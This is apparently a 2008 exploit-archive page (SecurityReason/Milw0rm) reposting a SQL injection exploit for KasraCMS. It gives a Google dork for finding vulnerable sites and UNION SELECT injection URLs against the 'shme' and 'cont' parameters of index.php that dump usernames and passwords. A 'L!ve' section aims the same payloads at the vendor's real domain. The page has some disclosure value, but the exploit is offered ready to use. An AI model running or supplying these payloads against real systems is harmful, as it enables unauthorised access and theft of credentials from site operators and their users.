|
 |
| SecurityReason | ||
| WLB | ||
| RSS | ||
| Corporate | ||
| Services | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
| Details : ExploitAlert | ||
 ExploitAlert : 5005 Milw0rm ID : 6837 Credit : G4N0K Date : 28.10.2008 Exploit Code : -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- =-=-=-=-=-=-= KasraCMS (index.php) Multiple Remote SQL Injection Vulnerabilities -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- =-=-=-=-=-=-= [~] Script: KasraCMS [~] Language : PHP [~] WebSite: http://kasracms.com [~] affected File: index.php [~] Type : Commercial [~] Report-Date : 25/10/2008 --[ DoRK ]-- intext:"2007-2008 Kasra ICT" --[ Founder ]-- G4N0K <mail.ganok[at]gmail.com> --[ Exploit ]-- [~] http://localhost/[path]/index.php?shme=-63 UNION ALL SELECT 0,0,concat(username,0x3a,password),0,0,0,0,0 FROM user-- [~] http://localhost/[path]/index.php?cont=-63 UNION ALL SELECT 0,0,0,concat(username,0x3a,password),0,0,0,0 FROM user-- --[ L!ve ]-- http://kasracms.com/index.php?cont=-63 UNION ALL SELECT 0,0,0,concat(username,0x3a,password),0,0,0,0 FROM user-- http://kasracms.com/index.php?shme=-63 UNION ALL SELECT 0,0,concat(username,0x3a,password),0,0,0,0,0 FROM user-- --[ Greetz ]-- [~] ALLAH [~] Tornado2800 <Tornado2800[at]gmail.com> [~] Hussain-X <darkangel_g85[at]yahoo.com> //ALLAH, forgimme... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- =-=-=-=-=-=-= EoX -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- =-=-=-=-=-=-= |
||
| Alert | ||
Microsoft VISTA TCP/IP stack buffer overflow
Microsoft Device IO Control wrapped by the iphlpapi.dll API shipping with Windows Vista 32 bit and 64 bit contains a possibly exploitable, buffer overflow corrupting kernel memory. |
||
| Apache |  |
|
» Apache Tomcat <= |
||
| PHP | |
|
» PHP |
||
- 2008-11-27| Copyright © SecurityReason. All Rights Reserved. |